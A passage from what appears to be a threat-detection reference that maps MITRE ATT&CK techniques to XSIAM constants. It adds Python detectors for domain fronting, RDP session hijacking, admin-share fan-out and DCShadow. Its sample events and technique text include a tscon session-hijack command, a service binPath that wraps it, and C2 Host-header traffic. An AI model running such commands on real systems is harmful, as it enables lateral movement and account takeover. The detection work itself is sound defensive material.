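    {"src_ip": "10.0.0.5", "dst_ip": "203.0.113.10",
     "sni": "www.domain-x.example", "http_host": "www.domain-x.example"},
    {"src_ip": "10.0.0.5", "dst_ip": "203.0.113.10",
     "sni": "domain-x.example", "http_host": "www.domain-x.example"},
    {"src_ip": "10.0.0.7", "dst_ip": "203.0.113.10",
     "sni": "www.domain-x.example", "http_host": "c2.domain-y.example"},
    {"src_ip": "10.0.0.9", "dst_ip": "203.0.113.10",
     "sni": "", "http_host": "c2.domain-y.example:443"},
]

if __name__ == "__main__":
    for finding in find_fronting(SAMPLE):
        print(finding)
```

This only works where the Host header is visible, i.e. behind a TLS-inspecting proxy; on uninspected traffic the SNI is all the network sees, and a fronted connection looks identical to a legitimate one to the fronting domain. Blank SNI on its own is also produced by some older clients, so the "blank_sni" finding is best scored together with the destination's reputation and the volume of such connections from one host.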
T1090.002 XDM_CONST.MITRE_TECHNIQUE_PROXY_EXTERNAL_PROXY Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion. External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server. https://attack.mitre.org/techniques/T1090/002
T1090.001 XDM_CONST.MITRE_TECHNIQUE_PROXY_INTERNAL_PROXY Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. https://attack.mitre.org/techniques/T1090/001
T1090.003 XDM_CONST.MITRE_TECHNIQUE_PROXY_MULTI_HOP_PROXY To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available Tor network. (Citation: Onion Routing) In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization's WAN. Protocols such as ICMP may be used as a transport. https://attack.mitre.org/techniques/T1090/003
T1012 XDM_CONST.MITRE_TECHNIQUE_QUERY_REGISTRY Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. https://attack.mitre.org/techniques/T1012
T1620 XDM_CONST.MITRE_TECHNIQUE_REFLECTIVE_CODE_LOADING Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, rather than creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snippets of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the "injection" loads code into the process's own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) https://attack.mitre.org/techniques/T1620
T1219 XDM_CONST.MITRE_TECHNIQUE_REMOTE_ACCESS_SOFTWARE An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) https://attack.mitre.org/techniques/T1219
T1563 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service. Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack) https://attack.mitre.org/techniques/T1563
T1563.002 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING_RDP_HIJACKING Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf) https://attack.mitre.org/techniques/T1563/002
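The distinguishing detail in the description is that tscon.exe run with System permissions connects to another user's session without credentials, whereas a user running tscon in their own context is only switching between their own sessions. The following is an added example of a process-creation check built on that distinction; it is written for this page and is neither XSIAM code nor MITRE's. The event shape is a constructed one (host, user, parent image, image, command line). It also flags tscon staged inside a service binPath, a common way of obtaining the SYSTEM context that this page does not itself describe (an assumption drawn from the cited Korznikov write-up):

```python
"""Flag tscon.exe session takeovers in process-creation telemetry.

Added example, not part of the XSIAM schema or MITRE's text. Event shape
is a constructed one: host, user, parent_image, image, cmdline.
"""
import re

# Matches "tscon 3", "tscon.exe 3 /dest:rdp-tcp#5", "...\tscon.exe 3", also
# when embedded in a longer command line (service binPath, cmd /k ...).
TSCON_RE = re.compile(
    r'(?:^|\\|\s)tscon(?:\.exe)?"?\s+(?P<session>\d+)(?:\s+/dest:(?P<dest>[^\s"]+))?',
    re.IGNORECASE,
)
# Service creation or reconfiguration: whatever is in binPath runs as SYSTEM
# when the service starts (assumption; not described on this page).
SC_RE = re.compile(r"^\s*(?:\S*\\)?sc(?:\.exe)?\s+(?:create|config)\b", re.IGNORECASE)
SYSTEM_ACCOUNTS = {"nt authority\\system", "system"}


def analyze_process_event(event):
    """Return None if tscon is not involved, otherwise a finding dict with
    severity 'high' (SYSTEM context or service binPath) or 'info'."""
    match = TSCON_RE.search(event["cmdline"])
    if not match:
        return None
    as_system = event["user"].lower() in SYSTEM_ACCOUNTS
    via_service = SC_RE.match(event["cmdline"]) is not None
    if as_system:
        via = "system_context"
    elif via_service:
        via = "service_binpath"
    else:
        via = "user_context"  # usually the user switching their own session
    return {
        "host": event["host"],
        "user": event["user"],
        "parent": event["parent_image"].rsplit("\\", 1)[-1].lower(),
        "session": int(match.group("session")),
        "dest": match.group("dest"),
        "via": via,
        "severity": "high" if via != "user_context" else "info",
    }


def find_rdp_hijack(events):
    return [f for f in map(analyze_process_event, events) if f and f["severity"] == "high"]


# Constructed sample events (not real data).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\tscon.exe", "cmdline": "tscon 2"},
    {"host": "SRV01", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\tscon.exe",
     "cmdline": "C:\\Windows\\System32\\tscon.exe 3 /dest:rdp-tcp#5"},
    {"host": "SRV01", "user": "CORP\\bob",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\sc.exe",
     "cmdline": 'sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#5"'},
    {"host": "SRV02", "user": "CORP\\carol",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in find_rdp_hijack(SAMPLE_EVENTS):
        print(finding)
```

Because the hijacked session keeps the victim's token, the follow-on activity will look like the victim; the tscon event is the point in the chain that still names the operator's host and account, so it is worth keeping as a correlation anchor. Red-team tooling that wraps the same call (the description mentions it) still has to spawn tscon or call its underlying API, so the process-creation event is the more durable signal of the two.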
T1563.001 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING_SSH_HIJACKING Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair. In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack) [SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078). https://attack.mitre.org/techniques/T1563/001
T1021 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) https://attack.mitre.org/techniques/T1021
T1021.003 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_DISTRIBUTED_COMPONENT_OBJECT_MODEL Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM) Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL) Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI) https://attack.mitre.org/techniques/T1021/003
T1021.001 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_REMOTE_DESKTOP_PROTOCOL Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware) https://attack.mitre.org/techniques/T1021/001
T1021.002 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_SMB_OR_ADMIN_SHARES Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba. Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares) https://attack.mitre.org/techniques/T1021/002
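The description names the hidden administrative shares (`C$`, `ADMIN$`, `IPC$`) that lateral movement over SMB goes through. One account touching `C$` on one host is routine administration; one account touching administrative shares on several hosts in a short window is the shape of the technique. The following is an added example of that fan-out check, written for this page (not XSIAM code and not MITRE's). It assumes a constructed share-access record shape (timestamp, account, source IP, target host, share path) of the kind a file-share audit event provides:

```python
"""Fan-out check: one account reaching administrative shares on many hosts.

Added example, not part of the XSIAM schema or MITRE's text. Record shape
is constructed: ts (seconds), user, src_ip, target_host, share (UNC path).
"""
from collections import defaultdict, deque

# IPC$ is also hidden, but nearly every RPC-based operation opens it, so it is
# far too noisy to count towards fan-out on its own.
ADMIN_SHARES = {"C$", "ADMIN$"}


def share_name(path):
    """'\\\\srv01\\C$' or '//srv01/C$' -> 'C$' (upper-cased)."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].upper()


def admin_share_fanout(events, min_hosts=3, window_s=600, shares=ADMIN_SHARES):
    """Return one finding per account whose administrative-share accesses
    reach at least min_hosts distinct hosts within any window_s-second window.
    Sliding window per account; each account is reported once."""
    per_user = defaultdict(deque)
    reported = set()
    findings = []
    for event in sorted(events, key=lambda e: e["ts"]):
        if share_name(event["share"]) not in shares:
            continue
        window = per_user[event["user"]]
        window.append(event)
        while window and event["ts"] - window[0]["ts"] > window_s:
            window.popleft()
        hosts = {e["target_host"] for e in window}
        if len(hosts) >= min_hosts and event["user"] not in reported:
            reported.add(event["user"])
            findings.append({
                "user": event["user"],
                "src_ips": sorted({e["src_ip"] for e in window}),
                "hosts": sorted(hosts),
                "first_ts": window[0]["ts"],
                "last_ts": event["ts"],
            })
    return findings


# Constructed sample records (not real audit data).
SAMPLE_EVENTS = [
    {"ts": 1000, "user": "CORP\\jdoe", "src_ip": "10.0.0.5", "target_host": "WS01", "share": "\\\\WS01\\C$"},
    {"ts": 1030, "user": "CORP\\jdoe", "src_ip": "10.0.0.5", "target_host": "WS01", "share": "\\\\WS01\\IPC$"},
    {"ts": 1100, "user": "CORP\\jdoe", "src_ip": "10.0.0.5", "target_host": "WS02", "share": "\\\\WS02\\ADMIN$"},
    {"ts": 1200, "user": "CORP\\jdoe", "src_ip": "10.0.0.5", "target_host": "WS03", "share": "\\\\WS03\\C$"},
    {"ts": 1300, "user": "CORP\\ops", "src_ip": "10.0.0.50", "target_host": "SRV01", "share": "\\\\SRV01\\C$"},
    # same account much later: outside the window, does not extend the finding
    {"ts": 5000, "user": "CORP\\jdoe", "src_ip": "10.0.0.5", "target_host": "WS09", "share": "\\\\WS09\\C$"},
]

if __name__ == "__main__":
    for finding in admin_share_fanout(SAMPLE_EVENTS):
        print(finding)
```

Tune min_hosts and window_s against the accounts that legitimately do this (software deployment, backup and vulnerability-scanning service accounts) and exclude them by name rather than raising the thresholds for everyone; a workstation-to-workstation pattern from an interactive user account is the case worth alerting on at low thresholds. Pass-the-hash use of the same shares, which the description also mentions, produces the same share-access events and is caught by the same check.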
T1021.004 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_SSH Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user's public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user. https://attack.mitre.org/techniques/T1021/004
T1021.006 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_WINDOWS_REMOTE_MANAGEMENT Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI) https://attack.mitre.org/techniques/T1021/006
T1018 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SYSTEM_DISCOVERY Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts`) in order to discover the hostname to IP address mappings of remote systems. https://attack.mitre.org/techniques/T1018
T1091 XDM_CONST.MITRE_TECHNIQUE_REPLICATION_THROUGH_REMOVABLE_MEDIA Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. https://attack.mitre.org/techniques/T1091
T1496 XDM_CONST.MITRE_TECHNIQUE_RESOURCE_HIJACKING Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it's not competing for resources.(Citation: Trend Micro War of Crypto Miners) https://attack.mitre.org/techniques/T1496
T1207 XDM_CONST.MITRE_TECHNIQUE_ROGUE_DOMAIN_CONTROLLER Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) https://attack.mitre.org/techniques/T1207
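The one step of DCShadow that the real domain controllers do see is the registration: new server and nTDSDSA objects appearing in the Configuration partition for a machine that is not a known DC, typically removed again shortly after the forged changes have replicated. The following is an added example that looks for exactly that in directory-service object change events; it is written for this page and is neither XSIAM code nor MITRE's. The event shape (timestamp, created/deleted, object class, object DN, acting account) is constructed, and the list of legitimate DCs is an assumption standing in for an inventory:

```python
"""Spot rogue DC registrations (DCShadow) in directory object change events.

Added example, not part of the XSIAM schema or MITRE's text. Event shape is
constructed: ts, event ('object_created' / 'object_deleted'), object_class,
object_dn, subject. KNOWN_DCS stands in for a real DC inventory.
"""
import re

KNOWN_DCS = {"DC01", "DC02"}  # assumption: inventory of legitimate domain controllers

# Server objects live at CN=<server>,CN=Servers,CN=<site>,CN=Sites,CN=Configuration,...
# and the nTDSDSA object one level below, at CN=NTDS Settings,CN=<server>,...
SITES_DN_RE = re.compile(r"CN=Sites,CN=Configuration,DC=", re.IGNORECASE)
SERVER_RDN_RE = re.compile(
    r"CN=([^,]+),CN=Servers,CN=[^,]+,CN=Sites,CN=Configuration", re.IGNORECASE
)
REGISTRATION_CLASSES = {"server", "ntdsdsa"}


def server_name_from_dn(dn):
    """Return the upper-cased server RDN from a server or nTDSDSA DN, else None."""
    match = SERVER_RDN_RE.search(dn)
    return match.group(1).upper() if match else None


def _deleted_after(events, dn, created_ts):
    """Seconds until the same DN is deleted, or None if it never is."""
    for event in events:
        if (event["event"] == "object_deleted"
                and event["object_dn"].lower() == dn.lower()
                and event["ts"] >= created_ts):
            return event["ts"] - created_ts
    return None


def find_rogue_dc_registrations(events, known_dcs=KNOWN_DCS):
    """Return one finding per server/nTDSDSA object created under
    CN=Sites,CN=Configuration for a server not in known_dcs. A short
    deleted_after_s is the DCShadow clean-up pattern."""
    events = sorted(events, key=lambda e: e["ts"])
    findings = []
    for event in events:
        if event["event"] != "object_created":
            continue
        if event["object_class"].lower() not in REGISTRATION_CLASSES:
            continue
        if not SITES_DN_RE.search(event["object_dn"]):
            continue
        server = server_name_from_dn(event["object_dn"])
        if server is None or server in known_dcs:
            continue
        findings.append({
            "server": server,
            "object_class": event["object_class"],
            "object_dn": event["object_dn"],
            "subject": event["subject"],
            "created_ts": event["ts"],
            "deleted_after_s": _deleted_after(events, event["object_dn"], event["ts"]),
        })
    return findings


# Constructed sample events (not real audit data).
_SITE = "CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=example"
SAMPLE_EVENTS = [
    {"ts": 10, "event": "object_created", "object_class": "server",
     "object_dn": "CN=WS-ATTACK," + _SITE, "subject": "CORP\\admin1"},
    {"ts": 11, "event": "object_created", "object_class": "nTDSDSA",
     "object_dn": "CN=NTDS Settings,CN=WS-ATTACK," + _SITE, "subject": "CORP\\admin1"},
    {"ts": 40, "event": "object_deleted", "object_class": "nTDSDSA",
     "object_dn": "CN=NTDS Settings,CN=WS-ATTACK," + _SITE, "subject": "CORP\\admin1"},
    {"ts": 41, "event": "object_deleted", "object_class": "server",
     "object_dn": "CN=WS-ATTACK," + _SITE, "subject": "CORP\\admin1"},
    # legitimate promotion of a known DC, and an unrelated user object
    {"ts": 500, "event": "object_created", "object_class": "nTDSDSA",
     "object_dn": "CN=NTDS Settings,CN=DC02," + _SITE, "subject": "CORP\\dcpromo-admin"},
    {"ts": 600, "event": "object_created", "object_class": "user",
     "object_dn": "CN=bob,CN=Users,DC=corp,DC=example", "subject": "CORP\\helpdesk"},
]

if __name__ == "__main__":
    for finding in find_rogue_dc_registrations(SAMPLE_EVENTS):
        print(finding)
```

These events only exist if object-access auditing (a SACL) is configured on the Configuration partition; without it the registration leaves no security-log trace on the real DCs, which is the gap the description refers to when it says the technique may bypass SIEM products. A hit on a host that is a freshly promoted DC is expected once; keep the inventory current so that promotion does not page the on-call engineer.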
Original Mapped Description
T1014 XDM_CONST.MITRE_TECHNIQUE_ROOTKIT Adversaries may use rootkits to hide the presence of programs, files, network connections, services,
drivers, and other system components. Rootkits are programs that hide the existence of malware by
intercepting/hooking and modifying operating system API calls that supply system information. (Citation:
Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level
in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for
Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac
OSX Rootkit) https://attack.mitre.org/techniques/T1014
T1053 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious
code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a
specified date and time. A task can also be scheduled on a remote system, provided the proper
authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on
a remote system typically requires being a member of an admin or otherwise privileged group on the
remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to
execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also
be abused to run a process under the context of a specified account (such as one with elevated
permissions/privileges). https://attack.mitre.org/techniques/T1053
T1053.001 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_LINUX_AT_JOB Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for
initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110)
command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix -
